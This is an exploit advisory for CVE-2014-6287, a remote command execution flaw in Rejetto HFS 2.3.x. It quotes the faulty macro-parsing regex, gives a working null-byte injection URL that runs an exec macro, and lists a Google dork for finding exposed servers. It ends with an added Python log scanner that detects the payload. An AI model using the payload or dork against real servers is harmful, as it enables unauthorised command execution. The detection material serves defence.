Rejetto HTTP File Server (HFS) 2.3.x – Remote Command Execution (1)

  • Author: Daniele Linguaglossa
    Date: 2014-09-15
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/34668/
  • # Exploit Title: HttpFileServer 2.3.x Remote Command Execution
    # Google Dork: intext:"httpfileserver 2.3"
    # Date: 11-09-2014
    # Remote: Yes
    # Exploit Author: Daniele Linguaglossa
    # Vendor Homepage: http://rejetto.com/
    # Software Link: http://sourceforge.net/projects/hfs/
    # Version: 2.3.x
    # Tested on: Windows Server 2008, Windows 8, Windows 7
    # CVE : CVE-2014-6287
    
    The issue exists due to a poor regex in the file ParserLib.pas:
    
    
    function findMacroMarker(s:string; ofs:integer=1):integer;
    begin result:=reMatch(s, '\{[.:]|[.:]\}|\|', 'm!', ofs) end;
    
    
    The regex does not handle a null byte, so a request to

    http://localhost:80/?search=%00{.exec|cmd.}

    stops the regex from parsing the macro; the macro is then executed, and remote code injection happens.
    
    
    ## EDB Note: This vulnerability will run the payload multiple times simultaneously. 
    ## Make sure to take this into consideration when crafting your payload (and/or listener).
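
The request shape described above (a percent-encoded null byte followed by HFS macro markers) can be searched for in web server or proxy access logs. The Python below is an added detection example, not part of the original advisory or of HFS; the combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_to_bytes

# Marker pattern copied from findMacroMarker in ParserLib.pas, as a bytes regex.
MACRO_MARKER = re.compile(rb'\{[.:]|[.:]\}|\|')
# Request line of a combined-format access log entry (assumed log format).
REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify_target(target):
    """Classify a request target as 'null+macro', 'macro-only', 'null' or 'clean'."""
    decoded = unquote_to_bytes(target)      # one round of percent-decoding
    nul = decoded.find(b"\x00")
    # The CVE-2014-6287 shape: a macro marker located after a null byte.
    if nul != -1 and MACRO_MARKER.search(decoded, nul + 1):
        return "null+macro"
    if MACRO_MARKER.search(decoded):
        return "macro-only"                 # markers with no null byte before them
    return "null" if nul != -1 else "clean"

def scan_log(lines):
    """Return (line_number, verdict) for every request that is not 'clean'."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_LINE.search(line)
        if not match:
            continue                        # not a parseable request line
        verdict = classify_target(match.group(1))
        if verdict != "clean":
            hits.append((number, verdict))
    return hits

# Constructed sample log lines (documentation IP range, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [15/Sep/2014:10:00:00 +0000] "GET /?search=report.pdf HTTP/1.1" 200 812',
    '203.0.113.7 - - [15/Sep/2014:10:00:01 +0000] "GET /?search=%00{.exec|cmd.} HTTP/1.1" 200 512',
    '203.0.113.7 - - [15/Sep/2014:10:00:02 +0000] "GET /?search=%00%7B.exec%7Ccmd.%7D HTTP/1.1" 200 512',
    '203.0.113.9 - - [15/Sep/2014:10:00:03 +0000] "GET /?search=a|b HTTP/1.1" 200 640',
]

if __name__ == "__main__":
    for line_number, verdict in scan_log(SAMPLE_LOG):
        print(f"line {line_number}: {verdict}")
```

Requests classified as `null+macro` match the advisory's pattern and warrant investigation on any host running HFS 2.3.x; `macro-only` and `null` hits are weaker signals that depend on what the server normally receives.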